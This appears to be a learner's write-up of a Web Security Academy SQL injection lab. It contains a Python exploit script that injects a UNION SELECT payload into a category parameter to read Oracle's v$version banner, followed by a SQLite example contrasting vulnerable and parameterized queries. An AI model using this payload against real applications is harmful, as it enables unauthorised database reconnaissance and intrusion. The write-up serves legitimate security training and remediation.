This lab helped me understand how SQL injection can go beyond simple login bypass or data leakage. By using a UNION SELECT injection, I was able to query internal database metadata — specifically from Oracle's v$version view — to determine the database type and version. This kind of information is crucial during real-world exploitation and recon, as it allows attackers to tailor further payloads to the specific DBMS.
[+] Start Burp Suite before running the script — it uses a proxy for visibility.
[+] The input in the category parameter is injectable.
[+] A UNION SELECT query is used to fetch database version details.
[+] Oracle-specific view v$version reveals DB type and version.
[+] The script checks for a success message in the response.
[+] This confirms that the query executed and data was retrieved.
Usage:

```shell
python3 exploit.py https://<your-lab-id>.web-security-academy.net
```
```python
import requests
import sys
import urllib3

# Burp re-signs TLS with its own CA, so certificate verification is disabled
# below (verify=False); silence the warning that would print on every request.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Route every request through Burp Suite so the injected request and the
# response containing the version string can be inspected.
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}


def exploit_sqli(url, payload):
    # The injectable input is the category parameter of the /filter endpoint.
    uri = '/filter?category='
    r = requests.get(url + uri + payload, verify=False, proxies=proxies)
    # The lab renders "Congratulations" once the version banner has been
    # displayed, so that message is the success signal.
    return "Congratulations" in r.text


if __name__ == "__main__":
    try:
        url = sys.argv[1].strip()
        # Close the original string literal, then UNION two BANNER columns
        # (matching the two columns of the original query) from Oracle's
        # v$version view; '+' encodes spaces in the URL and '--' comments
        # out the remainder of the original query.
        payload = "'UNION+SELECT+BANNER,BANNER+FROM+v$version--"
    except IndexError:
        print("[-] Usage: %s <url>" % sys.argv[0])
        print("[-] Example: %s https://<your-lab-id>.web-security-academy.net" % sys.argv[0])
        sys.exit(-1)

    if exploit_sqli(url, payload):
        print("[+] SQL injection successful!")
    else:
        print("[-] SQL injection unsuccessful")
```
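To show why the category filter is injectable and what closes the hole, here is an added example (my own code, not the lab's or the script above) of the server-side filter written both ways: string concatenation, which lets the UNION SELECT above pull database metadata into the product listing, and a bind parameter, which makes the same input an ordinary comparison value. Oracle is not available offline, so an in-memory SQLite database stands in and `sqlite_version()` takes the place of `BANNER FROM v$version`; the product rows and the payload string are constructed for the example.

```python
import sqlite3

# Constructed sample data: two columns, the same shape as the lab's listing
# that the UNION SELECT has to line up with.
PRODUCTS = [("Pet Toy", "Pets"), ("Gift Mug", "Gifts"), ("Hidden Item", "Lifestyle")]

# Constructed payload with the same structure as the page's: close the
# literal, UNION two columns of metadata, comment out the trailing quote.
# sqlite_version() stands in for Oracle's v$version.BANNER (assumption).
PAYLOAD = "' UNION SELECT sqlite_version(), sqlite_version()--"


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, category TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", PRODUCTS)
    return conn


def filter_vulnerable(conn, category):
    # The category value is spliced into the SQL text, so a closing quote
    # followed by UNION SELECT appends the attacker's query to the listing.
    sql = "SELECT name, category FROM products WHERE category = '" + category + "'"
    return conn.execute(sql).fetchall()


def filter_parameterized(conn, category):
    # Bind parameter: the driver sends the value separately from the SQL
    # text, so quotes, UNION and '--' are just characters being compared.
    sql = "SELECT name, category FROM products WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()


def demo():
    conn = new_db()
    return filter_vulnerable(conn, PAYLOAD), filter_parameterized(conn, PAYLOAD)


if __name__ == "__main__":
    leaked, safe = demo()
    print("concatenated query returned:", leaked)   # the DB version, twice
    print("parameterized query returned:", safe)    # no rows
```

The concatenated version returns the engine's version string as a "product" row, which is exactly what the lab's banner check looks for; the parameterized version returns nothing because no category literally equals the payload.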